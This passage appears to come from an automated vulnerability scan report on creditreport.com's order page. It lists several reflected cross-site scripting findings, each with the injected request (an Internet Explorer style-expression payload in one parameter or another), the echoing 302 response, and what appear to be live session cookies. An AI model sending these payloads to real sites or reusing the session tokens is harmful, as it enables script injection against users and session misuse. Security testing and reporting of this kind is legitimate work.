Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 25 Apr 2011 01:28:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=1003327cfc7'style='x:expression(alert(1))'cc28121e3c2&sc=671917&bcd=comptst
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.UEFF09008].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditreport.com/dni/Order1.aspx?areaid=22&amp;pkgid=C2TDM&amp;SiteVersionID=967&amp;SiteID=1003327cfc7'style='x:expression(alert(1))'cc28121e3c2&amp;sc=671917&amp;bcd=comptst'>
...[SNIP]...

6.448. http://www.creditreport.com/dni/Order1.aspx [SiteVersionID parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditreport.com
Path:   /dni/Order1.aspx

Issue detail

The value of the SiteVersionID request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ade26'style%3d'x%3aexpression(alert(1))'cb7fd16c2f was submitted in the SiteVersionID parameter. This input was echoed as ade26'style='x:expression(alert(1))'cb7fd16c2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967ade26'style%3d'x%3aexpression(alert(1))'cb7fd16c2f&SiteID=100332&sc=671917&bcd=comptst HTTP/1.1
Host: www.creditreport.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 25 Apr 2011 01:28:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967ade26'style='x:expression(alert(1))'cb7fd16c2f&SiteID=100332&sc=671917&bcd=comptst
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.U9CCF003F].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditreport.com/dni/Order1.aspx?areaid=22&amp;pkgid=C2TDM&amp;SiteVersionID=967ade26'style='x:expression(alert(1))'cb7fd16c2f&amp;SiteID=100332&amp;sc=671917&amp;bcd=comptst'>
...[SNIP]...

6.449. http://www.creditreport.com/dni/Order1.aspx [areaid parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditreport.com
Path:   /dni/Order1.aspx

Issue detail

The value of the areaid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be02d'style%3d'x%3aexpression(alert(1))'3c596ebb22d was submitted in the areaid parameter. This input was echoed as be02d'style='x:expression(alert(1))'3c596ebb22d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dni/Order1.aspx?areaid=22be02d'style%3d'x%3aexpression(alert(1))'3c596ebb22d&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst HTTP/1.1
Host: www.creditreport.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 25 Apr 2011 01:28:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditreport.com/dni/Order1.aspx?areaid=22be02d'style='x:expression(alert(1))'3c596ebb22d&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.UD4E1D882].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditreport.com/dni/Order1.aspx?areaid=22be02d'style='x:expression(alert(1))'3c596ebb22d&amp;pkgid=C2TDM&amp;SiteVersionID=967&amp;SiteID=100332&amp;sc=671917&amp;bcd=comptst'>
...[SNIP]...

6.450. http://www.creditreport.com/dni/Order1.aspx [bcd parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditreport.com
Path:   /dni/Order1.aspx

Issue detail

The value of the bcd request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d4144'style%3d'x%3aexpression(alert(1))'4ce95cc8b2 was submitted in the bcd parameter. This input was echoed as d4144'style='x:expression(alert(1))'4ce95cc8b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptstd4144'style%3d'x%3aexpression(alert(1))'4ce95cc8b2 HTTP/1.1
Host: www.creditreport.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 25 Apr 2011 01:29:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptstd4144'style='x:expression(alert(1))'4ce95cc8b2
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.U682A7C8F].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditreport.com/dni/Order1.aspx?areaid=22&amp;pkgid=C2TDM&amp;SiteVersionID=967&amp;SiteID=100332&amp;sc=671917&amp;bcd=comptstd4144'style='x:expression(alert(1))'4ce95cc8b2'>
...[SNIP]...

6.451. http://www.creditreport.com/dni/Order1.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditreport.com
Path:   /dni/Order1.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2e45'style%3d'x%3aexpression(alert(1))'4d83f582053 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2e45'style='x:expression(alert(1))'4d83f582053 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst&d2e45'style%3d'x%3aexpression(alert(1))'4d83f582053=1 HTTP/1.1
Host: www.creditreport.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 25 Apr 2011 01:29:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst&d2e45'style='x:expression(alert(1))'4d83f582053=1
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.U2FCC2CB2].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.creditreport.com/dni/Order1.aspx?areaid=22&amp;pkgid=C2TDM&amp;SiteVersionID=967&amp;SiteID=100332&amp;sc=671917&amp;bcd=comptst&amp;d2e45'style='x:expression(alert(1))'4d83f582053=1'>
...[SNIP]...

6.452. http://www.creditreport.com/dni/Order1.aspx [pkgid parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditreport.com
Path:   /dni/Order1.aspx

Issue detail

The value of the pkgid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 97167'style%3d'x%3aexpression(alert(1))'99b0eaeaf16 was submitted in the pkgid parameter. This input was echoed as 97167'style='x:expression(alert(1))'99b0eaeaf16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dni/Order1.aspx?areaid=22&pkgid=C2TDM97167'style%3d'x%3aexpression(alert(1))'99b0eaeaf16&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst HTTP/1.1
Host: www.creditreport.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 25 Apr 2011 01:28:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
